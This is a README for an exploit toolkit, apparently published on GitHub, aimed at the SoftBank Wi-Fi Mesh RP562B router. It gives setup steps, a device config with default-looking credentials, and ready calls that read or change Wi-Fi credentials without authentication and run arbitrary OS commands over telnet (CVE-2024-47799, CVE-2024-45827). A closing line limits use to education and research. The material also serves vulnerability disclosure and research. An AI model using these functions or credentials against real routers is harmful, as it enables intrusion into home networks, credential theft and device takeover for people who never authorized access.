This repository contains a Python API to exploit known vulnerabilities on SoftBank Wi-Fi Mesh RP562B, allowing unauthenticated attackers to obtain information about devices connected through Wi-Fi (CVE-2024-47799) and authenticated attackers to execute arbitrary OS commands (CVE-2024-45827).
SoftBank Mesh API RP562B Exploits API
- Python 3.x
- Required Python packages listed in
requirements.txt
-
Clone the repository:
git clone https://github.com/0xNslabs/SoftBankMeshAPI cd SoftBankMeshAPI -
Install the required dependencies:
pip install -r requirements.txt
Before running the script, you need to configure the device dictionary in main.py with the appropriate details:
device = { "mesh_ip": "INSERT_YOUR_DEVICE_IP", "mesh_username": "user", "mesh_password": "RTconf01", "wifi_name": "ThePromisedLan", "wifi_password": "00000000", }
To obtain Wi-Fi credentials without authentication, use the getWifiCreds function:
response = sbmeshAPI.getWifiCreds(device) print(response)
To set Wi-Fi credentials without authentication, use the setWifiCreds function:
response = sbmeshAPI.setWifiCreds(device) print(response)
To execute an arbitrary OS command with authentication, use the execTelnetRce function:
response = sbmeshAPI.execTelnetRce(device) print(response)
https://neroteam.com/blog/softbank-wi-fi-mesh-rp562b
Script PoC CVE-2024-47799 Remote Command Injection
This software is intended for educational and research purposes only. Unauthorized access to computer systems is illegal and unethical. The authors and contributors of this software are not responsible for any misuse or damage caused by this software.